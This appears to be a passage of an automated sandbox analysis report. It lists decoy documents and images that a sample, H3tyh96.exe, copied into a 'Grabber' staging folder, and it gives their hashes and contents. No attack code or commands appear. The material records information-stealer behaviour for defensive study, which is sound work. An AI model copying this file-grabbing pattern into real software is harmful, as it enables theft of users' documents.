Preview:	GIGIYTFFYTJMXILDVGFXDVEFQCHNFYFEULLQEETZRJVMRRJHJRTSPPAOMDMYNAGWNEBMIDVTHKVEEQISBNMPHNFVYDEIXBDPFHYTCLNZABIXDFYKJDBRYRTWDLZOXHMMCFSILUYMHVQPPEGCEUDABQUBALGXBEBBTFQFPGZCSFMMFCTBAMXKOPCAJHDRXWLGLWELWIKNGHWJKDKBDVZPNHUCSZFTPSDHZOUUHUWDVSEAQXIDUUMNXESGKGQYYBWVWCBVILKQLVAXNHJSZYYZUWKUTBRCTNQQXVQCKHLEJIFZFWACZEFAUJYVSEGBIHIZRMKJYWHTJECURPVKKWUKKOFVGYEOSDEDBUWBYBNHTAOSHDXDTPIWBWQANBSHMKUUHFNTKLQLSWCOLNGFZPIBZTKTDJTYYNNHDUOZEFWBJRQDBJTCXGDSCYEYJCUVSMWPBPZCBDOMCVGPOYMXSQANNOXIQBZMOMUCJZXAGIICUFLFDZJOBTEGSAQHEIBBWATDCJXSEIADCNGGARMLYLRJZSIBRRPFAORVDSNHOQWANXTRGLRQZZTEROQRQYBPGYXMSIGOYQMJDIJSQBFLNMQOGKOFUQVIWNLZBQMUSTEPCUCGVOFNLQMYFHDEDLGEYXHBHQNMKSASMZZEYCWBNZKYTKNRWJBUJJTXRIHTHPKRBWIFFKIBKCVEEYOHLCOOBFBXELQKMEOTDDLPFFLMCBOAJRNITAVONLYXBCYITNNXEUAVAVDHVGOGFHPXZDZUUQPRYTGQIFNRRHVDFAGSLTNZENPMFBPWMOHFFCIEPUUGBVHDOBSRPRHEPPLYLJUVAKAYIJRZKMAKRPYDSBIZTPWQFSZBWKYUIQXRDRUUPAWFEQRHVNMAPCFIPTHYPQPAZQNEACARWXUWSRKGERYPPRVAAPAVQYFCPYCRXLJQAMPXGLECYIZDRHPEMJPTXFOJABHMNZZHXHBCYXJEKEEQGKOAGJVHRWOSVEPEFFHDAVPR

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Documents\PALRGUCVEH\JDDHMPCDUJ.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687055908915499
Encrypted:	false
SSDEEP:	24:X3rfasg2Tpd/zBJY+q9FZP0DJR6BdqWD5gB8H36D6jXLiUk2ZTV:X+52L/dJYBjYJRoddD5C8HqD8ZDZTV
MD5:	94EDB575C55407C555A3F710DF2A8CB3
SHA1:	3AB8DF4B92C320D7D4C661EAB608E24B43F3DD13
SHA-256:	DD3A4A93D60E4B7840557A44DAAF77F6B6F85032C7DD5FB10BE54C07B0E1E261
SHA-512:	F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
Malicious:	false
Preview:	JDDHMPCDUJFORBKGTIFQHFPQNEKFAIHGBDYZBWNZMVTSZXTGRUOCZPQRXMGXBNMAHGODCTVNAHQHZMJYIYXLTVDMEAVEXSWFQCDVPRSSLREITYMWHUXVVKLPJXQJOHYPAVYXSIMBBOTIWYDKNCDVKZZMEIFEDNNXHAHMYLPOUGNKMPZVDEQRUPZBQCKZDQINFECCUZINROAFGLIAMVWHXPPXOWZMWTITWBJFIENEHRXRHRPVUAIUAJUYDBBSQQMTJJXOAAMHVKJEOIQRSNKKQSGCHAUKUYPJEBZIGZTVKUXZEQOUSZPQBHKFHECDNFGTGIDHSJFVLAKZPDYVJVWECRIKKUCCFNNHBLBFCJEKSUZTITTTLQVOHKFHXFIIYDOZNAIBCDIRXJAYKHCOEXBOGSGEGGQEMHFXIZREOFZJSAFXTGSSZLVKYOANMZNPNESDZMFYWTZHIKUSMZXACWZEIMGTFRSZCGICPOSTZRECQYWZECQVLAWXESWPCDXLHIMJHSZJSDAXNXHETAWLZDXTZAPKBHSMKMYYGVSJCUIJSIFUHHMPIRBASPUOUXKKPQCECQBBZUSIXEOXLFFSQIFCTAIRASCMWEHFOXGEJRXFGJODUTKITHEAKFFJQTQNWWKXXDELWDHHEDWUTMSLXQJPVGOBKELYSRBQFYKXFHWGSCVLTCFKOEJMLUXIZVDPFHXHTSMTDRTVCNLISGJFVQRUTMZDYPUYBAEASZCSEUVHWRIQDEJIZQQHJNTIIICFMMPVLXOIVTPCTDKFPDVWXSBXZDXFUMBJTJMKOOHIMIOAKEJSIDIOJSRMRYXLDVGDBBYXARBNHXOXMBXYOTEFOAXRAUKXTWKYYGWNAHHCIIKQHYAETGBWABTEMJKNTEUQAWGHRIKDGGNHUIVVPPYPYTZERZKDPLUSIKPBDPJOCBYQJDEKAVQKHFTPBZJQOUCVBHAHZZGEXOCYGYDCZICBOETRSJSMVEZKINDRIKZYTUIS

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Documents\PALRGUCVEH\PALRGUCVEH.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696508269038202
Encrypted:	false
SSDEEP:	24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
MD5:	0E9E92228B27AD7E7B4449467A529B0C
SHA1:	209F92CDFC879EE2B98DEF315CCE166AFEC00331
SHA-256:	284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
SHA-512:	CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
Malicious:	false
Preview:	PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Documents\PALRGUCVEH\ZGGKNSUKOP.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6959554225029665
Encrypted:	false
SSDEEP:	24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
MD5:	DCABA2748DFEAEF0BFBC56FD9F79315C
SHA1:	B87FBA690A774893B22B9F611DFDCB5CDC520269
SHA-256:	86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
SHA-512:	65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
Malicious:	false
Preview:	ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Documents\PALRGUCVEH\ZIPXYXWIOY.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697427014915338
Encrypted:	false
SSDEEP:	24:J87vGcgdreYqco0NFLg5eIatTFj9qVUq2Z:J83gAYq8NFRtx7Z
MD5:	2D7ACA56B5F340F28DD1D2B46D700BA6
SHA1:	3966684FF029665614B8DC948349178FB9E8C078
SHA-256:	B227E5E45D28AC063349BC70CC01A3F6DB15C101432A8609E0202064F7E5936D
SHA-512:	D4BFC2BB839DAEBAE8C894A0B8EB2314D2BE0304C82EB89BE16D6C820874952534CE0D93AE62EEF3DD2BE8A4D1E828B883E50BD204D04624AB945119D2FAB4F0
Malicious:	false
Preview:	ZIPXYXWIOYFFJDUIEBFLHIUBYNNMJGYPFQONGOLQHGMFRFYQGSVGNDSCQJYWDCIKWJWNYHFUEMJVEPAFIPAROVFAVARCOHESRJKUIUYDXNZOERBEQGHQNKYMVMEEMKKKEYXXPAKWYGCIXNFSVDOOEUTNGSDXMYEZKQTRDCZXZXIFSRMNAEPZWJKKYULUPGZCQORNOJBGAAOPLYNJCPFWSASJWTLALTQZLWOGFWQVOXGYBCMNEBDESHLNZZBETDIGNLTNPZEPEQAMYCNYWEKKQKDVZPNYLWAFZIPSSVNHOPUMIBTFXVVCNCPUSOKETVBDNZLCRKBRLGSHFSQLECHUOWGFFEMDWHASNSMAXKZZMDLZVQLADFBDUCCIJERQXKRXUCTKGDGKPESHHXUPKZSGNKOITMVITFCBELJVTCKENQCMCJEDZJDQDSKAYFGQEYICXDUOIJRYIMVXRKNBYXQEHUHYSPGEDSJBOQNXHFTSSRTPOXDVFXEPQUGWNEAKZJOKYPEYKXMOMKTKOBVISHMUGELPJCXBYNEXOAWOXHSEELVSCFMZYAMOLTGIWURMTZTRNGMWQZBRQHAIXVJIAFPZGWJZIOQLOAXJSGKMZNZCAVJWFGUFMQWQICMPVNAYRUHAMQLWLJMBERSFPEZHMNVAZFQAJEGYJQOMQWFTQVXZYTDPYVGZZPSNSOJWWKZDRPZKGTXYSENWOIQFXDIRWPJEYALOOEYQPHOPKSIZFNHPOXOKSTDVPNBSCDDKPOUVXMFBUNBMEUYGOSYMHMUNKKADTAEIUEMXYPOPMUVBHTBVKYAHHJXFUJPFZJZARAFLARBIWKXMNKXJLVBLJSZYYVIBZHROONQENYZGGMMETTMOFHCCQNUHPDEUTVVGUDBCKVXVUMRWPGZIPPUXJEJQIEQWLBUQBUODMWPSBFOYIQZWMYWPHWSKTRCKCRXWZUOTDTDRLLUSSQZXZZEATFSHBUWQUYHDLRMVVWFCPAZNSBXA

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Documents\ZGGKNSUKOP.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6959554225029665
Encrypted:	false
SSDEEP:	24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
MD5:	DCABA2748DFEAEF0BFBC56FD9F79315C
SHA1:	B87FBA690A774893B22B9F611DFDCB5CDC520269
SHA-256:	86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
SHA-512:	65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
Malicious:	false
Preview:	ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Documents\ZGGKNSUKOP.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6959554225029665
Encrypted:	false
SSDEEP:	24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
MD5:	DCABA2748DFEAEF0BFBC56FD9F79315C
SHA1:	B87FBA690A774893B22B9F611DFDCB5CDC520269
SHA-256:	86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
SHA-512:	65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
Malicious:	false
Preview:	ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Documents\ZIPXYXWIOY.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697427014915338
Encrypted:	false
SSDEEP:	24:J87vGcgdreYqco0NFLg5eIatTFj9qVUq2Z:J83gAYq8NFRtx7Z
MD5:	2D7ACA56B5F340F28DD1D2B46D700BA6
SHA1:	3966684FF029665614B8DC948349178FB9E8C078
SHA-256:	B227E5E45D28AC063349BC70CC01A3F6DB15C101432A8609E0202064F7E5936D
SHA-512:	D4BFC2BB839DAEBAE8C894A0B8EB2314D2BE0304C82EB89BE16D6C820874952534CE0D93AE62EEF3DD2BE8A4D1E828B883E50BD204D04624AB945119D2FAB4F0
Malicious:	false
Preview:	ZIPXYXWIOYFFJDUIEBFLHIUBYNNMJGYPFQONGOLQHGMFRFYQGSVGNDSCQJYWDCIKWJWNYHFUEMJVEPAFIPAROVFAVARCOHESRJKUIUYDXNZOERBEQGHQNKYMVMEEMKKKEYXXPAKWYGCIXNFSVDOOEUTNGSDXMYEZKQTRDCZXZXIFSRMNAEPZWJKKYULUPGZCQORNOJBGAAOPLYNJCPFWSASJWTLALTQZLWOGFWQVOXGYBCMNEBDESHLNZZBETDIGNLTNPZEPEQAMYCNYWEKKQKDVZPNYLWAFZIPSSVNHOPUMIBTFXVVCNCPUSOKETVBDNZLCRKBRLGSHFSQLECHUOWGFFEMDWHASNSMAXKZZMDLZVQLADFBDUCCIJERQXKRXUCTKGDGKPESHHXUPKZSGNKOITMVITFCBELJVTCKENQCMCJEDZJDQDSKAYFGQEYICXDUOIJRYIMVXRKNBYXQEHUHYSPGEDSJBOQNXHFTSSRTPOXDVFXEPQUGWNEAKZJOKYPEYKXMOMKTKOBVISHMUGELPJCXBYNEXOAWOXHSEELVSCFMZYAMOLTGIWURMTZTRNGMWQZBRQHAIXVJIAFPZGWJZIOQLOAXJSGKMZNZCAVJWFGUFMQWQICMPVNAYRUHAMQLWLJMBERSFPEZHMNVAZFQAJEGYJQOMQWFTQVXZYTDPYVGZZPSNSOJWWKZDRPZKGTXYSENWOIQFXDIRWPJEYALOOEYQPHOPKSIZFNHPOXOKSTDVPNBSCDDKPOUVXMFBUNBMEUYGOSYMHMUNKKADTAEIUEMXYPOPMUVBHTBVKYAHHJXFUJPFZJZARAFLARBIWKXMNKXJLVBLJSZYYVIBZHROONQENYZGGMMETTMOFHCCQNUHPDEUTVVGUDBCKVXVUMRWPGZIPPUXJEJQIEQWLBUQBUODMWPSBFOYIQZWMYWPHWSKTRCKCRXWZUOTDTDRLLUSSQZXZZEATFSHBUWQUYHDLRMVVWFCPAZNSBXA

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Downloads\BJZFPPWAPT.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.704346314649071
Encrypted:	false
SSDEEP:	24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
MD5:	8B66CD8FCBCEB253D75DB5CDE6291FA2
SHA1:	6CE0386190B9753849299B268AA7B8D15F9F72E2
SHA-256:	51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
SHA-512:	7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
Malicious:	false
Preview:	BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Downloads\BJZFPPWAPT.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.704346314649071
Encrypted:	false
SSDEEP:	24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
MD5:	8B66CD8FCBCEB253D75DB5CDE6291FA2
SHA1:	6CE0386190B9753849299B268AA7B8D15F9F72E2
SHA-256:	51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
SHA-512:	7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
Malicious:	false
Preview:	BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Downloads\DUUDTUBZFW.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701195573484743
Encrypted:	false
SSDEEP:	24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
MD5:	2530C45A92F347020337052A8A7D7B00
SHA1:	7EB2D17587824A2ED8BA10D7C7B05E2180120498
SHA-256:	8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
SHA-512:	78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
Malicious:	false
